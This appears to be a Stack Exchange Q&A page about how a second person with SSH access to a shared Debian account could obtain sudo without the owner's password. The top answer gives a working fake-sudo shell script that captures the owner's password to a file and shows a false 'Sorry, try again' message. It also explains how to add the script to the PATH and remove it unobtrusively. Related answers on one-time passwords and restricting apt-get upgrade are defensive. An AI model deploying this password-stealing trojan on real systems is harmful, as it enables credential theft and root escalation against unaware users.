Ssh – Obtain sudo priviledge without sudo password

Securitysshsudo

Context: Debian Linux.

Alice has a user account on the machine. She is one of sudoers and has a secure password. She accesses the machine via SSH using a SSH key only (password will not work).

By some administrative mistake, Bob gets access to the same account instead of getting a separate account: his SSH key is added to authorized_keys. Bob does not get the password from Alice.

How could Bob successfully perform a sudo? Assume that:

Bob has no access to the server except for the SSH access to Alice's account.
Alice will be connecting to her account regularly, performing sudo etc.

I assume this cannot be done without Alice's cooperation. Thus I am looking for some kind of phishing or social engineering attack, like replacing sudo with an alias that will log the password first.

It's basically a traditional root escalation problem with the added benefit of (unaware) user cooperation.

Best Answer

In the past this would have been doable without Alice’s help, since sudo’s tokens were valid across terminal sessions: Bob could just wait for Alice to authenticate with sudo, then use sudo himself without having to enter a password.

Even with per-terminal tokens, obtaining Alice’s password is relatively easy in the scenario described here, as long as Alice doesn’t check her environment thoroughly all the time:

using Alice’s account, create ~/.bin/sudo with something like

#!/bin/sh
if [ $# = 0 ]; then exec /usr/bin/sudo; fi
if [ ! -f ~/.bin/alices-password ]; then
  echo -n "[sudo] password for $USER: "
  read -s password
  echo
  echo ${password} > ~/.bin/alices-password
  sleep 2
  echo "Sorry, try again."
  /usr/bin/sudo -k
fi
exec /usr/bin/sudo "$@"

add ~/.bin to the path, in the appropriate rc-file depending on which shell Alice uses;
wait for Alice to use sudo in a shell which has noticed the presence of ~/.bin/sudo...

Bob can wait for a password to appear in ~/.bin/alices-password and try it himself before disabling the special variant (doing that in an unobtrusive way is left as an exercise for the reader — remember that the shell caches paths...).

There are a few subtleties in the script above, in particular sudo -k which ensures that “Sorry, try again.” will actually be followed by sudo asking for a password. The script could be improved further, that’s another exercise for the reader!

As you might imagine, this isn’t the only approach...

Related Solutions

Is there something like one-time sudo

I've never seen anything like one time sudo, but you could still get one time sudo by setting up one time passwords. There's an article in Linux Journal, titled: Configuring One-Time Password Authentication with OTPW, that covers the various ways that you can do this. There are 3 packages that they discuss which facilitate this:

I've never used any of these so I can not offer you any guidance or practical experiences in using any of them but the LJ article and the sources I liked look to have everything one would need to get started.

Security – Is Passwordless Sudo for `apt-get update` and `apt-get upgrade` Safe?

Allowing a less trusted user to run apt-get update is ok. They worst they can do is consume a lot of bandwidth and fill up some disk space, and they have plenty of other means to do this unless you've taken stringent measures to prevent this.

Allowing a user to run apt-get upgrade is likely to give them root access. Some packages query the user and might allow a shell escape; for example the user who has access to the terminal that apt-get upgrade (or any dpkg -i call) is running on might get prompted for what to do if a configuration file has been updated, and one of the options there is to run a shell to examine the situation.

You need to restrict the command some more:

#!/bin/sh
set -ex
exec </dev/null >"/var/log/automatic-apt-upgrade-$(date +%Y%m%d-%H%M%S)-$SUDO_USER.log" 2>&1
apt-get --assume-no upgrade

This shouldn't give the user a way to become root, since they can't interact with the package manager. As upgrades can sometimes break a system, and a user with only these permissions wouldn't be able to repair anything, this should only be done with a stable release, with only security updates pending. If it's a kernel update, let a user with full root access decide when to trigger a reboot.

By the way, the user wouldn't be able to inject package content — to do that, they'd need to be in control of the server distributing the package, and in addition to the server signing the package if the package is signed (which is the case for all official sources). It's irrelevant for this attack vector who's in command of the machine at the time of the upgrade.

All this being said… use unattended-upgrades, if that's what you want.

Best Answer

Related Solutions

Is there something like one-time sudo

Security – Is Passwordless Sudo for `apt-get update` and `apt-get upgrade` Safe?

Related Question